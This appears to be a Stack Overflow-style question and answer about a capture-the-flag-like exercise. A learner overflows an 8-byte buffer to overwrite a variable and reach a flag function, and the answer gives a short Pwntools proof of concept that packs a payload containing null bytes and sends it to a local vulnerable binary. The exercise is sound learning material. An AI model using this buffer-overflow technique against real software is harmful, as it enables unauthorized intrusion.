Search code examples
cbashstdinbuffer-overflowexploit

How do I send raw bytes interactively for a buffer overflow exploit?

I am trying, as part of an exercise, to exploit a simple program by overwriting a value of a variable though a buffer overflow. I am pretty sure I have the idea behind the exploit figured out, but since I am unable to inject my code I can't know for sure.

I have tried to build a script that uses Pwntools which is good for packing integers but I haven't managed to get it to work. I also tried to read up about TTY and how you could manipulate what the terminal sends to the process.

A simple pseudocode of the program that I am exploiting:

returnFlag() {
    print(flag)
}

main() {
    char[8] = input
    id = 999999

    input = fgets()

    if (id = 0) {
        returnFlag()
    }
}

My plan is to overflow the variable input and overwrite the value of id with 0 so it the function returnFlag() is executed. But when I input for example "AAAA\x00\x00\x00" I only get gibberish when I look at the memory with GDB.

This problem has driven me crazy for the last 1,5 weeks and any help would be greatly appreciated.

Solution

  • So I figured out how to solve the problem. Hopefully this will help someone else as well.

    The problem was that I did not know how to send the "exploit code" because it's made up by nulls. Fortunately there is a neat tool called Pwntools link that helps you just with that.

    With that tool you can interact with the program and "pack" integers so that you can send all the types of bytes necessary, including null-bytes.

    A simple POC using Pwntools to exploit the program above, lets call it vuln, would look like:

    #! /usr/bin/env python2
# Importerar rubbet
from pwnlib import *
from pwnlib.tubes.remote import *
from pwnlib.util.packing import *
from pwnlib.gdb import *

context.bits= '32'
context.endian= 'little'
context.log_level = 'debug'

pl = fit({0:'1', 8:[0x00000000]})

io = process('/vuln')
io.sendline(pl)
print(io.recvlines(1))

    So I first import all the libs, set up the environment that I am trying to exploit with context. Then I use the fit-function. It packs all of my input in a way that I can send it to the program. I am still trying to figure out what fit is doing behind the scenes.